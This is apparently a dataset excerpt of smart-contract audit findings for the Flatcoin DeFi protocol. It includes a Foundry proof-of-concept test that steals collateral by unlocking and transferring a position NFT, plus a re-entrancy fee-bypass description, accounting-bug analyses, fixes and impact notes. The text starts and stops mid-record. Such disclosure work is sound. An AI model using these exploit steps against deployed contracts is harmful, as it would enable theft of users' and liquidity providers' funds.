1 passed; 0 failed; 0 skipped; finished in 50.06ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\nчIt is recommended to prevent announcing order either through `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` if the leveraged position is already locked.чThe attacker can sell the leveraged position with a close order opened, execute the order afterward, and steal the underlying collateral.ч```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log(\"alice balance\", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log(\"alice after creating two orders\", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log(\"new owner of position NFT\", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log(\"alice after transfering position NFT out e.g. 
selling\", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log(\"alice after executing delayerd order and cashing out profit\", finalBalance);\\n console2.log(\"profit\", finalBalance - balance);\\n}\\n```\\n -A malicious user can bypass limit order trading fees via cross-function re-entrancyчhighчA malicious user can bypass limit order trading fees via cross-function re-entrancy, since `_safeMint` makes an external call to the user before updating state.\\nIn the `LeverageModule` contract, the `_mint` function calls `_safeMint`, which makes an external call `to` the receiver of the NFT (the `to` address).\\n\\nOnly after this external call, `vault.setPosition()` is called to create the new position in the vault's storage mapping. This means that an attacker can gain control of the execution while the state of `_positions[_tokenId]` in FlatcoinVault is not up-to-date.\\n\\nThis outdated state of `_positions[_tokenId]` can be exploited by an attacker once the external call has been made. They can re-enter `LimitOrder::announceLimitOrder()` and provide the tokenId that has just been minted. 
In that function, the trading fee is calculated as follows:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n\\nHowever since the position has not been created yet (due to state being updated after an external call), this results in the `tradeFee` being 0 since `vault.getPosition(tokenId).additionalSize` returns the default value of a uint256 (0), and `tradeFee` = fee * size.\\nHence, when the limit order is executed, the trading fee (tradeFee) charged to the user will be `0`.\\nA user announces opening a leverage position, calling announceLeverageOpen() via a smart contract which implements `IERC721Receiver`.\\nOnce the keeper executes the order, the contract is called, with the function `onERC721Received(address,address,uint256,bytes)`\\nThe function calls `LimitOrder::announceLimitOrder()` to create the desired limit order to close the position. (stop loss, take profit levels)\\nThe contract then returns `msg.sig` (the function signature of the executing function) to satisfy the IERC721Receiver's requirement.\\nTo run this proof of concept:\\nAdd 2 files `AttackerContract.sol` and `ReentrancyPoC.t.sol` to `flatcoin-v1/test/unit` in the project's repo.\\nrun `forge test --mt test_tradingFeeBypass -vv` in the terminal\\n\\n\\nчTo fix this specific issue, the following change is sufficient:\\n```\\n// Remove the line below\\n_newTokenId = _mint(_account); \\n\\nvault.setPosition( \\n FlatcoinStructs.Position({\\n lastPrice: entryPrice,\\n marginDeposited: announcedOpen.margin,\\n additionalSize: announcedOpen.additionalSize,\\n entryCumulativeFunding: vault.cumulativeFundingRate()\\n }),\\n// Remove the line below\\n _newTokenId\\n// Add the line below\\n tokenIdNext\\n);\\n// Add the line below\\n_newTokenId = _mint(_account); \\n```\\n\\nHowever there are still more state changes that would occur after the `_mint` function (potentially 
yielding other cross-function re-entrancy if the other contracts were changed) so the optimum solution would be to mint the NFT after all state changes have been executed, so the safest solution would be to move `_mint` all the way to the end of `LeverageModule::executeOpen()`.\\nOtherwise, if changing this order of operations is undesirable for whatever reason, one can implement the following check within `LimitOrder::announceLimitOrder()` to ensure that the `positions[_tokenId]` is not uninitialized:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n\\n// Add the line below\\nrequire(additionalSize > 0, \"Additional Size of a position cannot be zero\");\\n```\\nчA malicious user can bypass the trading fees for a limit order, via cross-function re-entrancy. These trading fees were supposed to be paid to the LPs by increasing `stableCollateralTotal`, but due to limit orders being able to bypass trading fees (albeit during the same transaction as opening the position), LPs are now less incentivised to provide their liquidity to the protocol.ч```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n -Incorrect handling of PnL during liquidationчhighчThe incorrect handling of PnL during liquidation led to an error in the protocol's accounting mechanism, which might result in various issues, such as the loss of assets and the stable collateral total being inflated.\\nFirst Example\\nAssume a long position with the following state:\\nMargin Deposited = +20\\nAccrued Funding = -100\\nProfit & Loss (PnL) = +100\\nLiquidation Margin = 30\\nLiquidation Fee = 25\\nSettled Margin = Margin Deposited + Accrued Funding + PnL = 20\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the 
liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 100, while the LP's `stableCollateralTotal` will increase by 100.\\n```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n\\nSince the position's settle margin is below the liquidation margin, the position will be liquidated.\\nAt Line 109, the condition `(settledMargin > 0)` will be evaluated as `True`. At Line 123:\\n```\\nif (uint256(settledMargin) > expectedLiquidationFee)\\nif (+20 > +25) => False\\nliquidatorFee = settledMargin\\nliquidatorFee = +20\\n```\\n\\nThe `liquidationFee` will be to +20 at Line 127 below. This basically means that all the remaining margin of 20 will be given to the liquidator, and there should be no remaining margin for the LPs.\\nAt Line 133 below, the `vault.updateStableCollateralTotal` function will be executed:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n\\nstableCollateralTotal = (x + 100) - 100 = x\\n```\\n\\nWhen `vault.updateStableCollateralTotal` is set to `-100`, `stableCollateralTotal` is equal to $x$.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n // Check that the total margin deposited by the long traders is not -ve.\\n // To get this amount, we will have to account for the PnL and funding fees accrued.\\n int256 settledMargin = positionSummary.marginAfterSettlement;\\n\\n uint256 liquidatorFee;\\n\\n // If the settled margin is greater than 0, send a 
portion (or all) of the margin to the liquidator and LPs.\\n if (settledMargin > 0) {\\n // Calculate the liquidation fees to be sent to the caller.\\n uint256 expectedLiquidationFee = PerpMath._liquidationFee(\\n position.additionalSize,\\n liquidationFeeRatio,\\n liquidationFeeLowerBound,\\n liquidationFeeUpperBound,\\n currentPrice\\n );\\n\\n uint256 remainingMargin;\\n\\n // Calculate the remaining margin after accounting for liquidation fees.\\n // If the settled margin is less than the liquidation fee, then the liquidator fee is the settled margin.\\n if (uint256(settledMargin) > expectedLiquidationFee) {\\n liquidatorFee = expectedLiquidationFee;\\n remainingMargin = uint256(settledMargin) - expectedLiquidationFee;\\n } else {\\n liquidatorFee = uint256(settledMargin);\\n }\\n\\n // Adjust the stable collateral total to account for user's remaining margin.\\n // If the remaining margin is greater than 0, this goes to the LPs.\\n // Note that {`remainingMargin` - `profitLoss`} is the same as {`marginDeposited` + `accruedFunding`}.\\n vault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\n\\n // Send the liquidator fee to the caller of the function.\\n // If the liquidation fee is greater than the remaining margin, then send the remaining margin.\\n vault.sendCollateral(msg.sender, liquidatorFee);\\n } else {\\n // If the settled margin is -ve then the LPs have to bear the cost.\\n // Adjust the stable collateral total to account for user's profit/loss and the negative margin.\\n // Note: We are adding `settledMargin` and `profitLoss` instead of subtracting because of their sign (which will be -ve).\\n vault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\n }\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + 
positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(20 + (-100))})\\nvault.updateGlobalPositionData({marginDelta: 80})\\n\\nprofitLossTotal = 100\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = (y - 100) + 80 + 100 = (y + 80)\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = x + (-100) = (x - 100)\\n```\\n\\nThe final `newMarginDepositedTotal` is $y + 80$ and `stableCollateralTotal` is $x -100$, which is incorrect. In this scenario\\nThere is no remaining margin for the LPs, as all the remaining margin has been sent to the liquidator as a fee. The remaining margin (settled margin) is also not negative. Thus, there should not be any loss on the `stableCollateralTotal`. The correct final `stableCollateralTotal` should be $x$.\\nThe final `newMarginDepositedTotal` is $y + 80$, which is incorrect as this indicates that the long trader's pool has gained 80 ETH, which should not be the case when a long position is being liquidated.\\nSecond Example\\nThe current price of rETH is $1000.\\nLet's say there is a user A (Alice) who makes a deposit of 5 rETH as collateral for LP.\\nLet's say another user, Bob (B), comes up, deposits 2 rETH as a margin, and creates a position with a size of 5 rETH, basically creating a perfectly hedged market. Since this is a perfectly hedged market, the accrued funding fee will be zero for the context of this example.\\nTotal collateral in the system = 5 rETH + 2 rETH = 7 rETH\\nAfter some time, the price of rETH drop to $500. 
As a result, Bob's position is liquidated as its settled margin is less than zero.\\n$$ settleMargin = 2\\ rETH + \\frac{5 \\times (500 - 1000)}{500} = 2\\ rETH - 5\\ rETH = -3\\ rETH $$\\nDuring the liquidation, the following code is executed to update the LP's stable collateral total:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nLP's stable collateral total increased by 2 rETH.\\nSubsequently, the `updateGlobalPositionData` function will be executed.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nWithin the `updateGlobalPositionData` function, the `profitLossTotal` at Line 179 will be -5 rETH. This means that the long trader (Bob) has lost 5 rETH.\\nAt Line 205 below, the PnL of the long traders (-5 rETH) will be transferred to the LP's stable collateral total. In this case, the LPs gain 5 rETH.\\nNote that the LP's stable collateral total has been increased by 2 rETH earlier and now we are increasing it by 5 rETH again. Thus, the total gain by LPs is 7 rETH. If we add 7 rETH to the original stable collateral total, it will be 7 rETH + 5 rETH = 12 rETH. 
However, this is incorrect because we only have 7 rETH collateral within the system, as shown at the start.\\n```\\nFile: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n // Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees 
here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\n\\nThird Example\\nAt $T0$, the marginDepositedTotal = 70 ETH, stableCollateralTotal = 100 ETH, vault's balance = 170 ETH\\nBob's Long Position Alice (LP)\\nMargin = 70 ETH\\nPosition Size = 500 ETH\\nLeverage = (500 + 20) / 20 = 26x\\nLiquidation Fee = 50 ETH\\nLiquidation Margin = 60 ETH\\nEntry Price = $1000 per ETH Deposited = 100 ETH\\nAt $T1$, the position's settled margin falls to 60 ETH (margin = +70, accrued fee = -5, PnL = -5) and is subjected to liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 5, while the LP's `stableCollateralTotal` will increase by 5.\\n```\\nsettleFundingFees() = Long need to pay short 5\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = 70 + (-5) = 65\\n\\nstableCollateralTotal = 100 + (-(-5)) = 105\\n```\\n\\nNext, this part of the code will be executed to send a portion of the liquidated position's margin to the liquidator and LPs.\\n```\\nsettledMargin > 0 => True\\n(settledMargin > expectedLiquidationFee) => (+60 > +50) => True\\nremainingMargin = uint256(settledMargin) - expectedLiquidationFee = 60 - 50 = 10\\n```\\n\\n50 ETH will be sent to the liquidator and the remaining 10 ETH should goes to the LPs.\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(70 + 
(-5))})\\nvault.updateGlobalPositionData({marginDelta: -65})\\n\\nprofitLossTotal = -5\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 70 + (-65) + (-5) = 0\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = 120 + (-(5)) = 125\\n```\\n\\nThe reason why the profitLossTotal = -5 is because there is only one (1) position in the system. So, this loss actually comes from the loss of Bob's position.\\nThe `newMarginDepositedTotal = 0` is correct. This is because the system only has 1 position, which is Bob's position; once the position is liquidated, there should be no margin deposited left in the system.\\nHowever, `stableCollateralTotal = 125` is incorrect. Because the vault's collateral balance now is 170 - 50 (send to liquidator) = 120. Thus, the tracked balance and actual collateral balance are not in sync.чTo remediate the issue, the `profitLossTotal` should be excluded within the `updateGlobalPositionData` function during liquidation.\\n```\\n// Remove the line below\\n profitLossTotal = PerpMath._profitLossTotal(// rest of code)\\n\\n// Remove the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta // Add the line below\\n profitLossTotal\\n// Add the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta\\n\\nif (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n}\\n\\n_globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) // Add the line below\\n _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n});\\n \\n// Remove the line below\\n _updateStableCollateralTotal(// Remove the line below\\nprofitLossTotal);\\n```\\n\\nThe existing `updateGlobalPositionData` function still 
needs to be used for other functions besides liquidation. As such, consider creating a separate new function (e.g., updateGlobalPositionDataDuringLiquidation) solely for use during the liquidation that includes the above fixes.\\nThe following attempts to apply the above fix to the three (3) examples described in the report to verify that it is working as intended.\\nFirst Example\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the liquidation.\\nDuring funding settlement:\\nStableCollateralTotal = $x$ + 100\\nmarginDepositedTotal = $y$ - 100\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n```\\n\\nStableCollateralTotal = ($x$ + 100) - 100 = $x$\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(20 + (-100)) = 80\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta = ($y$ - 100) + 80 = ($y$ - 20)\\nNo change to StableCollateralTotal here. Remain at $x$\\nConclusion:\\nThe LPs should not gain or lose in this scenario. Thus, the fact that the StableCollateralTotal remains as $x$ before and after the liquidation is correct.\\nThe `marginDepositedTotal` is ($y$ - 20) is correct because the liquidated position's remaining margin is 20 ETH. 
Thus, when this position is liquidated, 20 ETH should be deducted from the `marginDepositedTotal`\\nNo revert during the execution.\\nSecond Example\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nStableCollateralTotal = 5 + 2 = 7 ETH\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(2 + 0) = -2\\nmarginDepositedTotal = marginDepositedTotal + marginDelta = 2 + (-2) = 0\\nConclusion:\\nStableCollateralTotal = 7 ETH, marginDepositedTotal = 0 (Total 7 ETH tracked in the system)\\nBalance of collateral in the system = 7 ETH. Thus, both values are in sync. No revert.\\nThird Example\\nDuring funding settlement (Transfer 5 from Long to LP):\\nmarginDepositedTotal = 70 + (-5) = 65\\nStableCollateralTotal = 100 + 5 = 105\\nTransfer fee to Liquidator\\n50 ETH sent to the liquidator from the system: Balance of collateral in the system = 170 ETH - 50 ETH = 120 ETH\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nStableCollateralTotal = 120 ETH\\nDuring Global Position Update:\\nmarginDelta= -(position.marginDeposited + positionSummary.accruedFunding) = -(70 + (-5)) = -65\\nmarginDepositedTotal = 65 + (-65) = 0\\nConclusion:\\nStableCollateralTotal = 120 ETH, marginDepositedTotal = 0 (Total 120 ETH tracked in the system)\\nBalance of collateral in the system = 120 ETH. Thus, both values are in sync. 
No revert.чThe following is a list of potential impacts of this issue:\\nFirst Example: LPs incur unnecessary losses during liquidation, which would be avoidable if the calculations were correctly implemented from the start.\\nSecond Example: An error in the protocol's accounting mechanism led to an inflated increase in the LPs' stable collateral total, which in turn inflated the number of tokens users can withdraw from the system.\\nThird Example: The accounting error led to the tracked balance and actual collateral balance not being in sync.ч```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n -Asymmetry in profit and loss (PnL) calculationsчhighчAn asymmetry arises in profit and loss (PnL) calculations due to relative price changes. This discrepancy emerges when adjustments to a position lead to differing PnL outcomes despite equivalent absolute price shifts in rETH, leading to loss of assets.\\nScenario 1\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T2$, the price of rETH increased to $2000. Thus, Bob's PnL is as follows: he gains 20 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n\\nImportant Note: In terms of dollars, each ETH earns $1000. Since the position held 40 ETH, the position gained $40000.\\nScenario 2\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T1$, the price of rETH dropped to $500. 
An adjustment is executed against Bob's long position, and a `newMargin` is computed to account for the PnL accrued till now, as shown in Line 191 below. Thus, Bob's PnL is as follows: he lost 40 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($500 - $1000) / $500\\nPnL = -$20000 / $500 = -40 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40)\\ rETH$ and `lastPrice` set to $500.\\nImportant Note 1: In terms of dollars, each ETH lost $500. Since the position held 40 ETH, the position lost $20000\\n```\\nFile: LeverageModule.sol\\n // This accounts for the profit loss and funding fees accrued till now.\\n uint256 newMargin = (marginAdjustment +\\n PerpMath\\n ._getPositionSummary({position: position, nextFundingEntry: cumulativeFunding, price: adjustPrice})\\n .marginAfterSettlement).toUint256();\\n..SNIP..\\n vault.setPosition(\\n FlatcoinStructs.Position({\\n lastPrice: adjustPrice,\\n marginDeposited: newMargin,\\n additionalSize: newAdditionalSize,\\n entryCumulativeFunding: cumulativeFunding\\n }),\\n announcedAdjust.tokenId\\n );\\n```\\n\\nAt $T2$, the price of rETH increases from $500 to $2000. Thus, Bob's PnL is as follows:\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $500) / $2000\\nPnL = $60000 / $2000 = 30 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40 + 30)\\ rETH$, which is equal to $(x - 10)\\ rETH$. This effectively means that Bob has lost 10 rETH of the total margin he deposited.\\nImportant Note 2: In terms of dollars, each ETH gains $1500. 
Since the position held 40 ETH, the position gained $60000.\\nImportant Note 3: If we add up the loss of $20000 at 𝑇1 and the gain of $60000 at 𝑇2, the overall PnL is a gain of $40000 at the end.\\nAnalysis\\nThe final PnL of a position should be equivalent regardless of the number of adjustments/position updates made between $T0$ and $T2$. However, the current implementation does not conform to this property. Bob gains 20 rETH in the first scenario, while Bob loses 10 rETH in the second scenario.\\nThere are several reasons that lead to this issue:\\nThe PnL calculation emphasizes relative price changes (percentage) rather than absolute price changes (dollar value). This leads to asymmetric rETH outcomes for the same absolute dollar gains/losses. If we have used the dollar to compute the PnL, both scenarios will return the same correct result, with a gain of $40000 at the end, as shown in the examples above. (Refer to the important note above)\\nThe formula for PnL calculation is sensitive to the proportion of the price change relative to the current price. This causes the rETH gains/losses to be non-linear even when the absolute dollar gains/losses are the same.\\nExtra Example\\nThe current approach to computing the PnL will also cause issues in another area besides the one shown above. The following example aims to demonstrate that it can cause a desync between the PnL accumulated by the global positions AND the PnL of all the individual open positions in the system.\\nThe following shows the two open positions owned by Alice and Bob. The current price of ETH is $1000 and the current time is $T0$\\nAlice's Long Position Bob's Long Position\\nPosition Size = 100 ETH\\nEntry Price = $1000 Position Size = 50 ETH\\nEntry Price = $1000\\nAt $T1$, the price of ETH drops from $1000 to $750, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. 
Thus, the `marginDepositedTotal` decreased by 50 ETH.\\n```\\npriceShift = $750 - $1000 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $750 = -50 ETH\\n```\\n\\nAt $T2$, the price of ETH drops from $750 to $500, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. Thus, the `marginDepositedTotal` decreased by 75 ETH.\\n```\\npriceShift = $500 - $750 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $500 = -75 ETH\\n```\\n\\nIn total, the `marginDepositedTotal` decreased by 125 ETH (50 + 75), which means that the long traders lost 125 ETH from $T0$ to $T2$.\\nHowever, when we compute the loss of Alice and Bob's positions at $T2$, they lost a total of 150 ETH, which deviated from the loss of 125 ETH in the global position data.\\n```\\nAlice's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (100 ETH * -$500) / $500 = -100 ETH\\n\\nBob's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (50 ETH * -$500) / $500 = -50 ETH\\n```\\nчConsider tracking the PnL in dollar value/term to ensure consistency between the rETH and dollar representations of gains and losses.\\nAppendix\\nCompared to SNX V2, it is not vulnerable to this issue. The reason is that in SNX V2 when it computes the PnL, it does not \"scale\" down the result by the price. 
The PnL in SNXv2 is simply computed in dollar value ($positionSize \\times priceShift$), while FlatCoin protocol computes in collateral (rETH) term ($\\frac{positionSize \\times priceShift}{price}$).\\n```\\nfunction _profitLoss(Position memory position, uint price) internal pure returns (int pnl) {\\n int priceShift = int(price).sub(int(position.lastPrice));\\n return int(position.size).multiplyDecimal(priceShift);\\n}\\n```\\n\\n```\\n/*\\n * The initial margin of a position, plus any PnL and funding it has accrued. The resulting value may be negative.\\n */\\nfunction _marginPlusProfitFunding(Position memory position, uint price) internal view returns (int) {\\n int funding = _accruedFunding(position, price);\\n return int(position.margin).add(_profitLoss(position, price)).add(funding);\\n}\\n```\\nчLoss of assets, as demonstrated in the second scenario in the first example above. The tracking of profit and loss, which is the key component within the protocol, both on the position level and global level, is broken.ч```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n -Incorrect price used when updating the global position dataчhighчIncorrect price used when updating the global position data leading to a loss of assets for LPs.\\nNear the end of the liquidation process, the `updateGlobalPositionData` function at Line 159 will be executed to update the global position data. However, when executing the `updateGlobalPositionData` function, the code sets the price at Line 160 below to the position's last price (position.lastPrice), which is incorrect. 
The price should be set to the current price instead, and not the position's last price.\\n```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nThe reason why the `updateGlobalPositionData` function expects a current price to be passed in is that within the `PerpMath._profitLossTotal` function, it will compute the price shift between the current price and the last price to obtain the PnL of all the open positions. 
Also, per the comment at Line 170 below, it expects the current price of the collateral to be passed in.\\nThus, it is incorrect to pass in the individual position's last/entry price, which is usually the price of the collateral when the position was first opened or adjusted some time ago.\\nThus, if the last/entry price of the liquidated position is higher than the current price of collateral, the PnL will be inflated, indicating more gain for the long traders. Since this is a zero-sum game, this also means that the LP loses more assets than expected due to the inflated gain of the long traders.\\n```\\nFile: FlatcoinVault.sol\\n /// @notice Function to update the global position data.\\n /// @dev This function is only callable by the authorized modules.\\n /// @param _price The current price of the underlying asset.\\n /// @param _marginDelta The change in the margin deposited total.\\n /// @param _additionalSizeDelta The change in the size opened total.\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = 